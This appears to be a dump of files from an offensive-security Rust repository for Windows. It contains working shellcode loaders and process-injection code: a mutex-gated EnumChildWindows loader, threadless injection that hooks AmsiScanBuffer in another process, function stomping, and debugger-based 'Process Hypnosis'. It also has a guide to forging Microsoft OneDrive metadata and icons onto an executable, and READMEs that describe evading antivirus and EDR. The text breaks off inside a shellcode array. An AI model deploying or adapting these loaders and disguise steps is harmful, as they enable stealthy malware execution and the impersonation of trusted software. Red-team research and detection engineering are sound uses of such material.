## Enumeration/check_wow64.rs

/*
    Check if the current process is running under WOW64 
*/

use winapi::um::{processthreadsapi::GetCurrentProcess, wow64apiset::IsWow64Process};

fn current_process() -> Result<bool, Box<dyn std::error::Error>> {
    let process_handle = unsafe { GetCurrentProcess() };
    let mut is_wow64: i32 = 0;

    let result = unsafe { IsWow64Process(process_handle, &mut is_wow64) };

    if result == 0 {
        return Err("Failed to check if process is WOW64".into());
    }

    Ok(result != 0 && is_wow64 != 0)
}

fn main() {
    match current_process() {
        Ok(wow64) => {
            if wow64 {
                println!("Current Process is WOW64");
            } else {
                println!("Current Process is not WOW64");
            }
        }
        Err(e) => eprintln!("Error: {}", e),
    }
}
```

## Metadata_Modification/.gitignore
```
/target
```

## Metadata_Modification/Cargo.toml
```toml
[package]
name = "Metadata_Modification"
version = "0.1.0"
edition = "2021"

[dependencies]
winapi = {version = "0.3.9", features = ["winuser"]}

[build-dependencies]
windres = "0.2.2"
```

## Metadata_Modification/README.md
```markdown
## Metadata Modification for Windows Rust Binaries

Replace the metadata modification from trusted file to our executable binary file.

## Methods !

* Choose your Target file. For example i have choosen `OneDrive.exe`

* I have attacted the file into ResourceHacker.exe file. Open it and choose the Target Binary file. In our case `OneDrive.exe`

<center>
    <img src="./images/image.png" width=550px>
    
</center>
<br>

* On Version Info. You can see the the content of resource.rc file. Either you can right click and download the .rc file. or you can just copy the BLOCK that contains data.  

<center>
    <img src="./images/image1.png" width=550px>
</center>
<br>

* Next create an Directory res/ and create `resource.rc` file. and paste the following data to the file.

    Modify the file from the `BLOCK "040904B0"`

```
        1 VERSIONINFO
        FILEVERSION 1,0,0,0
        PRODUCTVERSION 1,0,0,0
        FILEFLAGSMASK 0x3F
        FILEFLAGS 0x0
        FILEOS 0x40004
        FILETYPE 0x1
        FILESUBTYPE 0x0
        BEGIN
            BLOCK "StringFileInfo"
            BEGIN
                BLOCK "040904B0"
                BEGIN
        			VALUE "CompanyName", "Microsoft Corporation"
        			VALUE "FileDescription", "Microsoft OneDrive (64 bit) Setup"
        			VALUE "InternalName", "OneDriveSetup.exe"
        			VALUE "LegalCopyright", "Microsoft Corporation. All rights reserved."
        			VALUE "OriginalFilename", "OneDriveSetup.exe"
        			VALUE "ProductName", "Microsoft OneDrive"
        			VALUE "FileVersion", "24.226.1110.0004"
        			VALUE "ProductVersion", "24.226.1110.0004"
        			VALUE "SpecialBuild", "b/build/10555381-65ec-136d-7d57-ecec00fce7a0"
                END
            END
            BLOCK "VarFileInfo"
            BEGIN
                VALUE "Translation", 0x409, 1200
            END
        END

        1 ICON "res/icon.ico"
```

* After that Download an suitable .icon and place it in the `res/icon.ico` path.

* Now Add the following crates in `[build-dependencies]` category under the [dependencies] category.

<br>
<center>
    <img src="./images/image2.png" width=320px>
</center>
<br>

* Create an build.rs file from the directory. The tree structure directory will be like.

```
    Simple_Program\
    |__src\
    |   |___main.rs
    | 
    |__res\
    |   |__resource.rc
    |   |__icon.ico
    |
    |__build.rs
    |__Cargo.lock
    |__Cargo.toml
```

* Follow the code in the [build.rs](./build.rs) and compile the program. 

* After compiling. Look at the Results : )

<center>
    <img src="./images/image3.png" width=350px>
</center>
<br>

<center>
    <img src="./images/image4.png" width=350px>
</center>
<br>

# Credits

By [redacted](redacted)
```

## Metadata_Modification/build.rs
```rust
/*
    build.rs file !
*/

fn main(){
    
    let target_os = std::env::var("CARGO_CFG_TARGET_OS");
    if target_os.as_deref() == Ok("windows") {

        windres::Build::new().compile("res/resource.rc").unwrap();
            
        for entry in std::fs::read_dir("res").unwrap() {
            let entry = entry.unwrap();
            println!("cargo:rerun-if-changed={}", entry.path().display());
        }

    }
}
```

## Metadata_Modification/src/main.rs
```rust
fn main(){
    unsafe{
        winapi::um::winuser::MessageBoxA(
            std::ptr::null_mut(),
            b"Malware is illegal and for nerds ...!\0".as_ptr() as *const i8,
            b"Smukx Reporting\0".as_ptr() as *const i8,
            0x00000000 | 0x00000030,
        );
    }
}
```

## Process-Injection/CreateMutex.rs
```rust
/*
  Shellcode Execute using CreateMutexA
*/

use std::ffi::CString;
use std::ptr::null_mut;
use user32::EnumChildWindows;
use winapi::shared::winerror::ERROR_ALREADY_EXISTS;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::handleapi::CloseHandle;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::ctypes::c_void;
use winapi::um::synchapi::CreateMutexA;
use winapi::um::winnt::RtlMoveMemory;

extern "system" fn shell_exec_mutex() {

    let shellcode: [u8; 276] = [
        0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
        0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
        0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
        0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
        0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
        0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
        0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
        0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
        0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
        0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
        0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
        0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
        0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
        0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
        0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
        0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
        0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
        0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
    ];

    unsafe{
        let mem: *mut c_void = VirtualAlloc(
            null_mut(),
            shellcode.len(),
            0x1000, 
            0x40,
        );

        if !mem.is_null(){
            RtlMoveMemory(
                mem, 
                shellcode.as_ptr() as *const winapi::ctypes::c_void, 
                shellcode.len()
            );

            EnumChildWindows(null_mut(), Some(std::mem::transmute(mem)), 0);
        }
    }
}



fn main() {
    let mutex_name = CString::new("MeowMeowMutex").unwrap();
    
    unsafe{
        let h_mutex: *mut c_void = CreateMutexA(
            null_mut(),
            0,
            mutex_name.as_ptr(),
        );

        if GetLastError() == ERROR_ALREADY_EXISTS {
            if !h_mutex.is_null() && GetLastError() == ERROR_ALREADY_EXISTS{
                CloseHandle(h_mutex);
                return;
            }
        }
        
        shell_exec_mutex();

        if !h_mutex.is_null(){
            CloseHandle(h_mutex);
        }

    }
}
```

## Process-Injection/ThreadlessInject.rs
```rust
/*
    Threatless Injection in Rust
    Original credit Goes to : https://github.com/CCob/ThreadlessInject
*/

use sysinfo::System;
use winapi::ctypes::c_void;
use winapi::shared::minwindef::{DWORD, LPVOID};
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::handleapi::CloseHandle;
use winapi::um::libloaderapi::{GetProcAddress, LoadLibraryA};
use winapi::um::memoryapi::{VirtualAllocEx, VirtualProtectEx, WriteProcessMemory};
use winapi::um::processthreadsapi::OpenProcess;

const SHELLCODE: [u8; 106] = [
    0x53, 0x56, 0x57, 0x55, 0x54, 0x58, 0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A,
    0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x29, 0xD4,
    0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10,
    0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C,
    0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B,
    0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81,
    0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C,
    0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7,
    0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D, 0x5F, 0x5E, 0x5B, 0xC3
];

static mut SHELLCODE_LOADER: [u8; 55] = [
    0x58, 0x48, 0x83, 0xE8, 0x05, 0x50, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53,
    0x48, 0xB9, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0x48, 0x89, 0x08, 0x48, 0x83, 0xEC,
    0x40, 0xE8, 0x11, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59,
    0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF, 0xE0,
];

macro_rules! error {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\_____[-] {}", format!($msg, $($arg), *));
        std::process::exit(0);
    }
}

macro_rules! okey {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\_____[+] {}", format!($msg, $($arg), *));
    }
}

fn main(){
    let args: Vec<String> = std::env::args().collect();
    let process_name = &args[1];
    let pid = find_process(process_name)
    .expect("[!] Failed to find the PID of the target process");

    unsafe{
        let h_module = LoadLibraryA("amsi.dll\0".as_ptr() as *const i8);
        if h_module.is_null(){
            error!("LoadLibrary Failed with status {}", GetLastError());
        }
        
        let address = GetProcAddress(
            h_module, 
            "AmsiScanBuffer\0".as_ptr() as *const i8
        );

        let func_addr = address as *mut c_void;
        let h_process = OpenProcess(
            0x000F0000 | 0x00100000 | 0xFFFF,
            0,
            pid
        );

        if h_process.is_null(){
            error!("OpenProcess Failed with status {}", GetLastError());
        }

        okey!("AmsiScanBuffer Address: {:?}", func_addr);

        okey!("Patching the {}", "trampoline");

        let orgin_bytes = *(func_addr as *const u64);

        SHELLCODE_LOADER[18..26].copy_from_slice(&orgin_bytes.to_ne_bytes());

        // need to write an function for an memory hole !
        let addr_role = find_memory_role(
            func_addr as usize,
            h_process,
        ).expect("Memory Role Failed with status");

        write_shellcode(h_process, addr_role);
        
        install_trampoline(
            h_process,
            addr_role,
            func_addr,
        );

        CloseHandle(h_process);
    }
   
}

fn find_process(process_name: &str) -> Result<u32, ()>{
    let mut system = System::new_all();
    system.refresh_all();

    for(pid, proc) in system.processes(){
        if proc.name() == process_name{
            return Ok(pid.as_u32());
        }
    }

    Err(())
}

fn find_memory_role(func_address: usize, h_process: *mut c_void) -> Result<*mut c_void, String> {
    let mut address = (func_address & 0xFFFFFFFFFFF70000) - 0x70000000;
    while address < func_address + 0x70000000 {
        let tmp_address = unsafe {
            VirtualAllocEx(
                h_process,
                address as *mut c_void,
                (SHELLCODE.len() + SHELLCODE_LOADER.len()) as usize,
                0x1000 | 0x2000,
                0x04,
            )
        };

        if !tmp_address.is_null() {
            okey!("Allocated at: {:?}", tmp_address);
            return Ok(tmp_address);
        }

        address += 0x10000;
    }

    Err("[!] Memory Role Not Found".to_string())
}

fn install_trampoline(h_process: *mut c_void, address: *mut c_void, function_address: *mut c_void) {
    let mut trampoline = [0xE8, 0x00, 0x00, 0x00, 0x00];
    let rva = (address as usize).wrapping_sub(function_address as usize + trampoline.len());
    let mut old_protect: DWORD = 0;
    let mut number_bytes_written: usize = 0;

    let rva_bytes = rva.to_ne_bytes();
    trampoline[1..].copy_from_slice(&rva_bytes[..4]);

    unsafe {
        VirtualProtectEx(
            h_process,
            function_address,
            trampoline.len(),
            0x04,
            &mut old_protect,
        );

        WriteProcessMemory(
            h_process,
            function_address,
            trampoline.as_ptr() as LPVOID,
            trampoline.len(),
            &mut number_bytes_written,
        );

        VirtualProtectEx(
            h_process,
            function_address,
            trampoline.len(),
            0x40,
            &mut old_protect,
        );
    }
}


fn write_shellcode(h_process: *mut c_void, address: *mut c_void) {
    unsafe {
        let mut number_of_write: usize = 0;
        WriteProcessMemory(
            h_process, 
            address, 
            SHELLCODE_LOADER.as_ptr() as LPVOID, 
            SHELLCODE_LOADER.len(), 
            &mut number_of_write,
        );

        let shellcode_address = address.add(SHELLCODE_LOADER.len());
        WriteProcessMemory( 
            h_process, 
            shellcode_address, 
            SHELLCODE.as_ptr() as LPVOID, 
            SHELLCODE.len(), 
            &mut number_of_write,
        );

        let mut old_protect: DWORD = 0;
        VirtualProtectEx(
            h_process, 
            address, 
            SHELLCODE.len(), 
            0x40, 
            &mut old_protect,
        );
    }   
}
```

## Process-Injection/stomping_injection.rs
```rust
/*
    Function CUSTOM Stomping Injection
    Resource Used: 
        MSDOCS
        https://github.com/Idov31/FunctionStomping
*/

// # This Program and its POC are Different from others. 
// Let me explain line by line 
// 
macro_rules! error {
    ($msg:expr) => {
        println!("[-] {}", format!($msg));
        println!("Process Exited Due to Error");
        std::process::exit(0);
    }
}

use std::{
    ffi::c_void,
    ptr::{copy, null, null_mut},
};

use std::mem::transmute;

const SHELLCODE: [u8; 276] = [
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
    0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
    0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
    0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
    0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
    0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
    0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
    0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
    0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
    0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
    0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
    0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
    0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
    0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
    0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
    0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
    0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
];

/*
    * declaring winapi functions using extern "system" ?
    
    Wait what is extern "system" ?
        
        * The extern keyword is used to declare functions that are defined outside of Rust, typically in C or C++ libraries.
        * The "system" ABI (Application Binary Interface) specifies that the function follows the calling conventions used by 
            the system, which is important for ensuring correct function calls between Rust and system libraries.

    Wait this means that you dont need to import creates like winapi or windows ?!
        * YES: extern "system" allows you to declare and call functions directly from the system libraries that was written in C/C++.
                like those provided by windows os.
        * 

*/
extern "system" {
    // declaring function signatures. 
    fn LoadLibraryA(lpLibFileName: *const u8) -> *mut c_void;
    fn GetProcAddress(hModule: *mut c_void, lpProcName: *const u8) -> *mut c_void;
    fn VirtualProtect(lpAddress: *mut c_void, dwSize: usize, flNewProtect: u32, lpflOldProtect: *mut u32) -> i32;
    fn CreateThread(
        lpThreadAttributes: *const c_void,
        dwStackSize: usize,
        lpStartAddress: unsafe extern "system" fn(*mut c_void) -> u32,
        lpParameter: *mut c_void,
        dwCreationFlags: u32,
        lpThreadId: *mut u32,
    ) -> *mut c_void;
    fn WaitForSingleObject(hHandle: *mut c_void, dwMilliseconds: u32) -> u32;
}

const PAGE_EXECUTE_READWRITE: u32 = 0x40; 
const PAGE_READWRITE: u32 = 0x04;
const INFINITE: u32 = 0xFFFFFFFF;

unsafe extern "system" fn shellcode_thread(_: *mut c_void) -> u32 {

    let func_ptr = transmute::<_, *mut c_void>(SHELLCODE.as_ptr());

    let mut oldprotect = 0u32;
    if VirtualProtect(func_ptr, SHELLCODE.len(), PAGE_READWRITE, &mut oldprotect) == 0 {
        error!("[!] VirtualProtect (1) Failed");
    }

    copy(SHELLCODE.as_ptr(), func_ptr as *mut u8, SHELLCODE.len());

    if VirtualProtect(func_ptr, SHELLCODE.len(), PAGE_EXECUTE_READWRITE, &mut oldprotect) == 0 {
        error!("[!] VirtualProtect (2) Failed");
    }

    let hthread = CreateThread(
        null(),
        0,
        transmute(func_ptr),
        null_mut(),
        0,
        null_mut(),
    );

    if hthread.is_null(){
        error!("[!] CreateThread Failed");
    }

    WaitForSingleObject(hthread, INFINITE);

    0
}

fn main() {
    unsafe {

        let library_name = b"user32.dll\0";
        let function_name = b"MessageBoxA\0";
        
        // Loading user32.dll library
        let h_module = LoadLibraryA(library_name.as_ptr());
        if h_module.is_null() {
            error!("[!] LoadLibraryA Failed");
        }

        // Calling GetProcAddress to receive the address of the MessageBoxA from the lib
        let func = GetProcAddress(h_module, function_name.as_ptr());
        if func.is_null() {
            error!("[!] GetProcAddress Failed");
        }

        // stores the handle to the created thread
        let hthread = CreateThread(
            null(),
            0,
            shellcode_thread,
            null_mut(),
            0,
            null_mut(),
        );

        if hthread.is_null() {
            error!("[!] CreateThread Failed");
        }
        // Wait until the thread execution Finishes 
        WaitForSingleObject(hthread, INFINITE);
    }
}
```

## ProcessGhosting/Cargo.toml
```toml
[package]
name = "ProcessGhosting"
version = "0.1.0"
edition = "2021"
authors = ["Smukx","5mukx"]
description = "Process Ghosting in Implemented in Rust"
readme = "README.md"
repository = "https://github.com/Whitecat18/"
license = "MIT"

[dependencies]
ntapi = "0.4.1"
winapi = {version = "0.3.9", features = ["processenv","userenv","winbase","winuser", "fileapi", "handleapi", "errhandlingapi", "memoryapi"] }
```

## ProcessGhosting/README.md
```markdown
## Process Ghosting in Rust

Process Ghosting is a malware evasion technique where a file is created, marked for deletion, filled with target code, and then mapped into memory as an image section from which a new process is created. Once the process starts, the file is deleted, leaving no trace on disk, thus evading traditional file-based security checks. This method exploits the timing difference between process creation and security software's ability to detect and analyze new processes, allowing malware to execute without being easily detected by antivirus or EDR solutions that rely on file inspection or signatures.

For More information. Visit the implementation technique presented by Gabriel Landau:
https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack

### POC Image..

![Ghost Process](./image1.png)

### Implementation Methods

* Fetch a PE payload. This module simplifies fetching the PE payload by reading it directly from disk. Ideally, encrypt the payload and store it in the resource section.
* Create an empty file on the disk. This module will create a .tmp file in the $env:TMP directory. This file will be overwritten with the PE payload at a later step.
* Create a ghost section from the temporary file. A ghost section is created by calling NtCreateSection to create a section from the delete-pending .tmp file. After closing the file handle, the file is deleted from the disk.
* Create a process from the ghost section. Use the ghost section to create a process by calling the NtCreateProcessEx syscall.
* Write the process parameters and the environment block manually. Write these to the created process.
* Fetch the PE payload's entry point and execute it. Fetch the entry point and execute it through new thread creation.

## Credits and Reference

* https://github.com/hasherezade/process_ghosting.git
* https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack

Implemented in Rust by [@5mukx](https://x.com/5mukx).
```

## ProcessGhosting/src/structs.rs
```rust
/*
    Structs Implementation. 
*/

// Macro Construction !
#[macro_export]
macro_rules! prnt_wn_err{
    ($api_name:expr) => {
        eprintln!(
            "[!] {} Failed With Error: {}",
            $api_name,
            GetLastError()
        );
    };
}

#[macro_export]
macro_rules! prnt_nt_wn_err {
    ($api_name: expr, $status: expr) => {
        eprintln!(
            "[!] {} Failed with Error: {}",
            $api_name,
            $status 
        );
    };
}

#[macro_export]
macro_rules! delete_handle {
    ($handle:expr) => {
        if !$handle.is_null() && $handle != INVALID_HANDLE_VALUE {
            CloseHandle($handle);
            $handle = null_mut();
        }
    };
}

#[macro_export]

macro_rules! alloc {
    ($size:expr) => {
        LocalAlloc(LMEM_ZEROINIT, $size as usize) 
    };
}

#[macro_export]

macro_rules! free {
    ($buff:expr) => {
        LocalFree($buff as *mut c_void)
    };
}

#[macro_export]
macro_rules! realloc {
    ($buff:expr, $size:expr) => {
        unsafe { LocalReAlloc($buff, $size as usize, LMEM_MOVEABLE | LMEM_ZEROINIT) }
    };
}

pub const PS_INHERIT_HANDLES: u32 = 4;
```

## ProcessHypnosis/Cargo.toml
```toml
[package]
name = "ProcessHypnosis"
version = "0.1.0"
edition = "2021"

[dependencies]
winapi = {version = "0.3.9" , features = ["dbghelp","winbase","debugapi", "errhandlingapi", "memoryapi", "minwinbase", "processthreadsapi"]}
```

## ProcessHypnosis/README.md
```markdown
## Process Hypnosis in Rust

 <div align="center">
      <img src="./Hypnosis.jpg" width=220px>
</div>

**Process Hypnosis** is an advanced code injection technique that manipulates a target process's execution flow by acting as its debugger. Unlike traditional methods like `CreateRemoteThread` or `Process Hollowing`, it avoids suspicious API calls and memory allocation patterns, making it harder for security solutions to detect. Inspired by [Carlos Garrido's research](https://github.com/CarlosG13/Process-Hypnosis-Debugger-assisted-control-flow-hijack), this technique "hypnotizes" a process by freezing it during initialization, modifies its memory, and resumes execution with malicious code.

## PoC Image 

![Execution of Hypnosis](./image.png)
## Implementation Methods

1. **Debugger Attachment**  
   Create a target process (e.g., `notepad.exe`) with the `DEBUG_ONLY_THIS_PROCESS` flag using `CreateProcessW`. This freezes the process until debug events are handled.

2. **Event Monitoring**  
   Use `WaitForDebugEvent` to capture critical events:  
   - `CREATE_PROCESS_DEBUG_EVENT`: Extract the main thread's start address.  
   - `LOAD_DLL_DEBUG_EVENT`: Enumerate loaded modules without `GetModuleHandle`.

3. **Shellcode Injection**  
   Overwrite the main thread's entry point (`lpStartAddress`) with malicious shellcode via `WriteProcessMemory`. The debugger automatically bypasses memory protection checks.

4. **Detach & Execute**  
   Call `DebugActiveProcessStop` to unfreeze the process. Execution resumes at the modified entry point, triggering the shellcode.

## Some Features 

- **No Suspicious APIs**  
  Avoids `VirtualAllocEx`, `CreateRemoteThread`, and `ResumeThread` – common EDR/AV detection vectors.
- **No Memory Allocation**  
  Directly hijacks the existing thread's entry point instead of allocating new memory regions.
- **Debugger-Powered Stealth**  
  Leverages legitimate debugging mechanisms to evade IAT/Inline hooks.
- **Symbol Resolution**  
  Uses `SymFromName` (instead of `GetProcAddress`) to resolve function addresses like `NtProtectVirtualMemory`.


## References

1. [Carlos Garrido's Original Research](https://github.com/CarlosG13/Process-Hypnosis-Debugger-assisted-control-flow-hijack)  
2. [Control Flow Hijacking Defense Survey](https://www.infocomm-journal.com/cjnis/article/2019/2096-109x/2096-109x-5-6-00010.shtml)

Hypnotize processes, not people.
```

## ProcessHypnosis/src/main.rs
```rust
/*
    Process_Hypnosis [Fixed]
*/

use std::{
    ffi::OsStr, os::windows::ffi::OsStrExt, ptr::null_mut
};

use winapi::{
    ctypes::{c_char, c_void}, 
    um::{
        dbghelp::{SymFromNameW, SYMBOL_INFOW}, 
        debugapi::{ContinueDebugEvent, DebugActiveProcessStop, WaitForDebugEvent}, 
        errhandlingapi::GetLastError, 
        memoryapi::{ReadProcessMemory, WriteProcessMemory}, 
        minwinbase::{DEBUG_EVENT, EXCEPTION_BREAKPOINT, LOAD_DLL_DEBUG_EVENT}, 
        processthreadsapi::{CreateProcessW, PROCESS_INFORMATION, STARTUPINFOW}
    }
};

macro_rules! okey {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\_____[+] {}", format!($msg, $($arg), *));
    }
}

macro_rules! error {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\_____[-] {}", format!($msg, $($arg), *));
        println!("Exiting ...");
        return;
    }
}

type BOOL = i32;
type HANDLE = *mut c_void;

fn main(){

    let shellcode: [u8; 328] = [
        0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
        0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
        0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
        0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
        0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
        0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
        0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
        0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
        0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
        0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
        0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
        0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
        0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
        0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
        0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
        0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
        0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
        0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
        0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
        0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
        0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
        0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
        0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
